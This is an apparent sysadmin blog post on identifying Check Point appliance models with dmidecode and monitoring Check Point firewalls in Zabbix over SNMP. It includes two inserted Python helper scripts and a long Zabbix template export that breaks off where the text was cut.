Dead Packets

06/06/2013

Finding the model of a Check Point server

Filed under: checkpoint, tips and tricks — drak @ 9:57 PM

Finding the model and serial number of a server running SPLAT is not as easy as it should be, but once learned it is never forgotten:

dmidecode | egrep 'Prod|erial'

Then just compare the output against the tables in the link under References.
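The grep above matches every "Product Name" and "Serial Number" line dmidecode prints, and on a real box the Base Board and Chassis handles carry their own, so you are left guessing which serial is the appliance's. As an added example (not part of the original post), here is a small Python parser that keeps only the System Information handle. The dmidecode output embedded in it is constructed with fictitious values; the read_live helper, which shells out to `dmidecode -t system`, is assumed to run as root on the appliance and is not needed for the offline run.

```python
"""Added example, not from the original post: parse dmidecode output and
return only the System Information handle's Manufacturer, Product Name and
Serial Number, instead of every handle's as `egrep 'Prod|erial'` does."""
import subprocess

# Constructed dmidecode output with fictitious values; a real appliance
# prints many more handles than this.
SAMPLE_DMI = """# dmidecode 2.11
SMBIOS 2.5 present.

Handle 0x0001, DMI type 1, 27 bytes
System Information
\tManufacturer: ExampleVendor
\tProduct Name: EXAMPLE-MODEL
\tSerial Number: SN0000EXAMPLE
\tUUID: 00000000-0000-0000-0000-000000000000

Handle 0x0002, DMI type 2, 15 bytes
Base Board Information
\tManufacturer: ExampleBoards
\tProduct Name: EXAMPLE-BOARD
\tSerial Number: MB0000EXAMPLE
"""

WANTED = ("Manufacturer", "Product Name", "Serial Number")


def parse_handles(text):
    """Split dmidecode output into {section title: {field: value}}.
    A section starts at a 'Handle ...' line, its title is the next line,
    and its fields are the indented 'Key: value' lines up to a blank line."""
    handles = {}
    lines = iter(text.splitlines())
    for line in lines:
        if not line.startswith("Handle "):
            continue
        title = next(lines, "").strip()
        fields = {}
        for body in lines:
            if not body.strip():          # blank line ends the handle
                break
            key, sep, value = body.strip().partition(": ")
            if sep:                       # skip nested lists without values
                fields[key] = value
        handles.setdefault(title, fields)  # keep the first handle of a kind
    return handles


def system_asset(text):
    """Manufacturer / Product Name / Serial Number of the system handle only."""
    sysinfo = parse_handles(text).get("System Information", {})
    return {k: sysinfo.get(k, "") for k in WANTED}


def read_live():
    """Run dmidecode on the box itself (needs root); -t system limits the
    output to the System Information handle."""
    out = subprocess.run(["dmidecode", "-t", "system"], capture_output=True,
                         text=True, check=True).stdout
    return system_asset(out)


if __name__ == "__main__":
    for k, v in system_asset(SAMPLE_DMI).items():
        print(f"{k}: {v}")
```

Feed the Product Name it returns to the reference tables to map the OEM name to the Check Point appliance model.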

To get the serial number on a Nokia appliance:

clish -c "show asset hardware"

Referências
Find UTM-1 Check Point Appliance model from CLI

12/03/2013

Monitoring Check Point with Zabbix – Part 2

Filed under: checkpoint,monitoring — drak @ 4:24 PM

In this article we import a template to monitor Check Point firewalls in Zabbix and verify that collection is working.

Installing Zabbix is out of scope for this post; the focus is configuring SNMP on the Check Point and setting up data collection and graphs on an already installed Zabbix. It is worth remembering, though, that SNMP support must be enabled when Zabbix is installed/compiled.

This article is split into two parts: in the first we enabled SNMP, and now we configure collection in Zabbix. If your firewall is not yet set up to expose information via SNMP, configure it first.

First, let us define what is important to monitor on a firewall:

  • CPU
  • Memory
  • Interface traffic
  • Number of concurrent connections

Specifically for a Check Point firewall running SecurePlatform it is also important to monitor the disks.

Each of these items can be broken down for more detail, e.g. real memory, swap in use, etc. The goal here is to build a template that collects everything relevant for a usage-trend (capacity) report of the environment and for troubleshooting.
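Before importing an export like the one below it pays to check it mechanically: which MIB each OID comes from, what multiplier the server will apply (UCD memory counters arrive in KB, hrSystemUptime in hundredths of a second), and whether anything was left half-edited. The following audit script is an added example, not code from the original post or from Zabbix. It parses the 2.0 export format, and the cut-down template embedded in it is constructed from items that appear in the full template on this page, with memTotalReal64 and memFreeReal64 deliberately omitted so the calculated-item check has something to report.

```python
"""Pre-import audit of a Zabbix 2.0 template export.  Added example, not
code from the original post or from Zabbix.  It reads the export format
shown on this page, classifies each item's OID, applies the item's
multiplier to a raw polled value the way the server would, and flags
SNMPv2c items carrying SNMPv3 passphrase macros, memory items with mixed
unit spellings, and calculated items whose operands are missing."""
import re
import xml.etree.ElementTree as ET

# Numeric item types used by the Zabbix 2.0 export format.
ITEM_TYPE = {0: "zabbix agent", 3: "simple check", 4: "snmpv2 agent",
             6: "snmpv3 agent", 15: "calculated"}

# Constructed, cut-down template built from items in the page's export;
# memTotalReal64/memFreeReal64 are left out on purpose so the
# calculated-item check has something to report.
SAMPLE_TEMPLATE = """<zabbix_export><version>2.0</version><templates><template>
 <template>Template CheckPoint SNMP</template>
 <items>
  <item><name>Available real memory</name><type>4</type><multiplier>1</multiplier>
   <snmp_oid>1.3.6.1.4.1.2021.4.6.0</snmp_oid><key>memAvailReal</key><delay>10</delay>
   <units>B</units><formula>1024</formula><snmpv3_securitylevel>0</snmpv3_securitylevel>
   <snmpv3_authpassphrase/><snmpv3_privpassphrase/><params/></item>
  <item><name>Firewall Policy Install Time</name><type>4</type><multiplier>0</multiplier>
   <snmp_oid>1.3.6.1.4.1.2620.1.1.25.2.0</snmp_oid><key>fwInstallTime</key><delay>900</delay>
   <units/><formula>1</formula><snmpv3_securitylevel>0</snmpv3_securitylevel>
   <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
   <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase><params/></item>
  <item><name>Hardware Uptime</name><type>4</type><multiplier>1</multiplier>
   <snmp_oid>1.3.6.1.2.1.25.1.1.0</snmp_oid><key>hrSystemUptime</key><delay>60</delay>
   <units>uptime</units><formula>0.01</formula><snmpv3_securitylevel>0</snmpv3_securitylevel>
   <snmpv3_authpassphrase/><snmpv3_privpassphrase/><params/></item>
  <item><name>Real used memory</name><type>15</type><multiplier>0</multiplier>
   <snmp_oid/><key>memUsedReal64</key><delay>30</delay><units>bytes</units>
   <formula>1</formula><snmpv3_securitylevel>0</snmpv3_securitylevel>
   <snmpv3_authpassphrase/><snmpv3_privpassphrase/>
   <params>memTotalReal64-memFreeReal64</params></item>
 </items>
</template></templates></zabbix_export>"""


def _text(elem, tag, default=""):
    child = elem.find(tag)
    return (child.text or "").strip() if child is not None else default


def load_items(xml_text):
    """One dict per <item> with just the fields the audit needs."""
    items = []
    for it in ET.fromstring(xml_text).iter("item"):
        # Zabbix applies <formula> only when <multiplier> is 1.
        factor = float(_text(it, "formula", "1")) if _text(it, "multiplier") == "1" else 1.0
        items.append({
            "key": _text(it, "key"),
            "type": int(_text(it, "type", "0")),
            "oid": _text(it, "snmp_oid"),
            "delay": int(_text(it, "delay", "0")),
            "units": _text(it, "units"),
            "factor": factor,
            "v3_creds": bool(_text(it, "snmpv3_authpassphrase") or _text(it, "snmpv3_privpassphrase")),
            "params": _text(it, "params"),
        })
    return items


def oid_family(oid):
    """Name the MIB an OID belongs to (the three families used on this page)."""
    for prefix, mib in (("1.3.6.1.4.1.2620.", "CHECKPOINT-MIB"),
                        ("1.3.6.1.4.1.2021.", "UCD-SNMP-MIB"),
                        ("1.3.6.1.2.1.25.", "HOST-RESOURCES-MIB")):
        if oid.startswith(prefix):
            return mib
    return "other"


def normalize(item, raw):
    """Scale a raw SNMP value as the server would (KB to bytes, ticks to s)."""
    return raw * item["factor"]


def audit(items):
    """Return human-readable findings; an empty list means the export is clean."""
    findings, keys = [], {i["key"] for i in items}
    for i in items:
        if i["type"] == 4 and i["v3_creds"]:
            findings.append(f"{i['key']}: SNMPv2c item carries SNMPv3 passphrase macros "
                            "(ignored as-is; clear them or make the item SNMPv3)")
        if i["type"] == 15:
            missing = sorted(set(re.findall(r"[A-Za-z_][\w.]*", i["params"])) - keys)
            if missing:
                findings.append(f"{i['key']}: calculated item references missing keys {missing}")
    mem_units = {i["units"] for i in items if i["key"].startswith("mem")}
    if len(mem_units) > 1:
        findings.append(f"memory items mix units {sorted(mem_units)}; "
                        "Zabbix only auto-scales 'B', so use one spelling")
    return findings


if __name__ == "__main__":
    items = load_items(SAMPLE_TEMPLATE)
    for i in items:
        fam = oid_family(i["oid"]) if i["oid"] else "-"
        print(f"{i['key']:<16} {ITEM_TYPE[i['type']]:<13} {fam:<18} x{i['factor']:g} every {i['delay']}s")
    for f in audit(items):
        print("WARN", f)
```

Run it against the full export before importing; on a clean template only the summary lines print. One point the audit cannot fix for you: every type-4 item sends the community string held in {$SNMP_COMMUNITY} in cleartext, so if the gateway supports SNMPv3 it is worth switching the items to type 6 and filling the SNMPv3 macros properly rather than leaving them half-set as in the fwInstallTime item.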

Zabbix Template – CheckPoint SNMP:

<?xml version="1.0" encoding="UTF-8"?>
<zabbix_export>
    <version>2.0</version>
    <date>2013-03-08T17:09:31Z</date>
    <groups>
        <group>
            <name>Templates</name>
        </group>
    </groups>
    <templates>
        <template>
            <template>Template CheckPoint SNMP</template>
            <name>Template CheckPoint SNMP</name>
            <groups>
                <group>
                    <name>Templates</name>
                </group>
            </groups>
            <applications>
                <application>
                    <name>Check Point General Stats</name>
                </application>
                <application>
                    <name>Connections</name>
                </application>
                <application>
                    <name>CPU</name>
                </application>
                <application>
                    <name>High Availability</name>
                </application>
                <application>
                    <name>Memory</name>
                </application>
                <application>
                    <name>Services</name>
                </application>
                <application>
                    <name>Interfaces</name>
                </application>
                <application>
                    <name>General</name>
                </application>
                <application>
                    <name>Disk partitions</name>
                </application>
            </applications>
            <items>
                <item>
                    <name>Active real memory</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.7.4.4.0</snmp_oid>
                    <key>memActiveReal64</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>B</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Memory</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Active total memory</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.7.4.2.0</snmp_oid>
                    <key>memActiveVirtual64</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>B</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Memory</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Available real memory</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>1</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2021.4.6.0</snmp_oid>
                    <key>memAvailReal</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>B</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1024</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Memory</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Current connections</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.1.25.3.0</snmp_oid>
                    <key>fwNumConn</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Connections</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Firewall Module State</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.1.1.0</snmp_oid>
                    <key>fwModuleState</key>
                    <delay>900</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Check Point General Stats</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Firewall Policy Install Time</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.1.25.2.0</snmp_oid>
                    <key>fwInstallTime</key>
                    <delay>900</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                    <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Check Point General Stats</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Hardware Uptime</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>1</multiplier>
                    <snmp_oid>1.3.6.1.2.1.25.1.1.0</snmp_oid>
                    <key>hrSystemUptime</key>
                    <delay>60</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>uptime</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>0.01</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Check Point General Stats</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>High Availability Mode</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.5.11.0</snmp_oid>
                    <key>haWorkMode</key>
                    <delay>900</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>High Availability</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>High Availability State</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.5.6.0</snmp_oid>
                    <key>haState</key>
                    <delay>900</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>High Availability</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>ICMP ping response time</name>
                    <type>3</type>
                    <snmp_community/>
                    <multiplier>0</multiplier>
                    <snmp_oid/>
                    <key>icmppingsec</key>
                    <delay>60</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>0</value_type>
                    <allowed_hosts/>
                    <units>s</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Services</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>OS Name</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.5.1.0</snmp_oid>
                    <key>osName</key>
                    <delay>3600</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>5</inventory_link>
                    <applications>
                        <application>
                            <name>Check Point General Stats</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Peak number of connections</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.1.25.4.0</snmp_oid>
                    <key>fwPeakNumConn</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Connections</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Processor system time</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.7.2.2.0</snmp_oid>
                    <key>procSysTime</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>%</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>CPU</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Processor usage</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.7.2.4.0</snmp_oid>
                    <key>procUsage</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>%</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>CPU</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Processor user time</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.7.2.1.0</snmp_oid>
                    <key>procUsrTime</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>%</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>CPU</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Product Name</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.1.10.0</snmp_oid>
                    <key>fwProduct</key>
                    <delay>3600</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>1</inventory_link>
                    <applications>
                        <application>
                            <name>Check Point General Stats</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Product Version</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.4.1.0</snmp_oid>
                    <key>svnVersion</key>
                    <delay>3600</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>6</inventory_link>
                    <applications>
                        <application>
                            <name>Check Point General Stats</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Real used memory</name>
                    <type>15</type>
                    <snmp_community/>
                    <multiplier>0</multiplier>
                    <snmp_oid/>
                    <key>memUsedReal64</key>
                    <delay>30</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>B</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params>memTotalReal64-memFreeReal64</params>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Memory</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>SSH service is running</name>
                    <type>3</type>
                    <snmp_community/>
                    <multiplier>0</multiplier>
                    <snmp_oid/>
                    <key>net.tcp.service[ssh]</key>
                    <delay>60</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Services</name>
                        </application>
                    </applications>
                    <valuemap>
                        <name>Service state</name>
                    </valuemap>
                </item>
                <item>
                    <name>Total memory (real + swap)</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.7.4.1.0</snmp_oid>
                    <key>memTotalVirtual64</key>
                    <delay>3600</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>B</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Memory</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Total real memory</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>1</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2021.4.5.0</snmp_oid>
                    <key>memTotalReal</key>
                    <delay>3600</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>B</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1024</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
